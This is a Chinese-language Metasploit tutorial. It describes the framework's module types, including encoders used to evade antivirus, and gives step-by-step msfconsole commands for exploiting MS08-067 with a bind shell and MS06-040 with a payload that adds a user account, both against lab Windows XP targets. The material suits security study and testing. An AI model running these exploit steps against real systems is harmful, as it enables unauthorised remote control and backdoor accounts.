Msfconsole提供了一个一体化的集中控制台。通过msfconsole,你可以访问和使用所有的metasploit的插件,payload,利用模块,post模块等等。Msfconsole还有第三方程序的接口,比如nmap,sqlmap等,可以直接在msfconsole里面使用。

在启动MSF终端之后,可以首先输入help命令列出MSF终端所支持的命令列表,包括核心命令集和后端数据库命令集。

对于其中的大部分命令,你可以输入help[COMMAND],进一步查看该命令的使用帮助信息。

MSF的六个模块:exploit,encoder,payload,aux,post,nops

exploit——渗透攻击模块

​测试者利用它来攻击一个系统,程序,或服务,以获得开发者意料之外的结果。常见的有内存溢出,网站程序漏洞利用,配置错误exploit。​​​​exploits总的来说共分为两类溢出(exploit)攻击方法,即主动溢出和被动溢出。主动溢出是针对目标主机的漏洞主动的进行攻击以获得控制权限,被动溢出是针对目标主机被动的监听然后获得相应的操作。​​​​Exploit共分为13种,分别是:ais、bsdi、dialup、freebsd、hpux、irix、linux、multi、netware、osx、solaris、unix、windows。其中windows下面的最多。​

encoder——编码器模块,对指令重新进行编码,用以实现反检测功能、指令顺利执行等

​在metasploit中内置了27种encode模块,可对metasploit中的exploit进行编码(encode),以避免反病毒软件检测。如:​​​​generic/none normal The "none" Encoder​​​​mipsbe/longxor normal XOR Encoder​​​​mipsle/longxor normal XOR Encoder​​​​php/base64 great PHP Base64 encoder​​​​ppc/longxor normal PPC LongXOR Encoder​

payload——攻击载荷模块, 由一些可动态运行在远程主机上的代码组成

​我们想让被攻击系统执行的程序,如reverse shell 可以从目标机器与测试者之间建立一个反响连接,bind shell 绑定一个执行命令的通道至测试者的机器。payload 也可以是只能在目标机器上执行有限命令的程序。​

aux——辅助模块,用以实现辅助攻击,如端口扫描工具、口令猜测破解、敏感信息嗅探等

post——后渗透攻击模块

​在渗透攻击取得目标系统远程控制权之后,在受控系统中进行各式各样的后渗透攻击动作,比如获取敏感信息、进一步拓展、实施跳板攻击等。​

nops——空指令模块,用以产生缓冲区填充的非操作性指令

使用msfconsole,了解msfcli,msfgui

Metasploit目前提供了三种用户使用接口,一个是GUI模式,另一个是console终端模式,第三种是CLI(命令行)模式。

msfcli 虽然和msfconsole一样同为命令行界面,但是他不提供交互的命令行模式,直接通过命令行执行输出结果,直接调用辅助模块和攻击模块对目标进行渗透攻击,更为高效便捷。

msfgui 图形化界面工具可轻松地单击鼠标,输入目标 IP 地址,就可以使用 Metasploit 强大功能渗透进入目标系统 。 

举例:

常用exploit,payload设置参数

  1. show exploit——显示Metasploit中所有渗透攻击模块
  2. show playload——查看所有活动状态的攻击载荷

攻击靶机并获取shell

       被攻击者IP地址:192.168.120.131,操作系统Windows XP sp3 

       攻击者IP地址:192.168.120.130

1.//查找ms08_067漏洞

msf > search ms08_067

     

2、//使用MS08_067漏洞
 use exploit/windows/smb/ms08_067_netapi

3、//设置远程地址,正向连接
set RHOST 192.168.120.131

4、//设置ShellCode
set payload windows/shell_bind_tcp

5、//显示配置的选项
 show options

6、//expliot攻击

    成功返回Shell

命令含义:

1. show exploits

显示MetaSploit目前所能够测试的所有漏洞及相关描述

2. usewindows/smb/ms06_040_netapi

选择MS06-040进行测试

3, info

显示当前所选漏洞的描述信息

4. show targets

显示当前所选漏洞能够影响的操作系统

5. set target 0

设置target为0,即自动识别Windows 2000 和Windows XP系统

6. show payloads

显示可适用于当前所选漏洞的shellcode

7. set payloadwindows/adduser

选用adduser为shellcode

8. show options

显示当前所选漏洞和shellcode需要配置的选项

9. set RHOST192.168.88.137

按照 show options 的提示设置目标主机的地址

10.set PASS 123456

按照 show options 的提示设置账户密码

11.set USERpolarNight

按照 show options 上的提示设置用户名

12. exploit

参考资料:

1.​​msfconsole 控制台使用和操作​​

2.​​Metasploit用法大全​​

3.​​Metasploit进行渗透windows7​​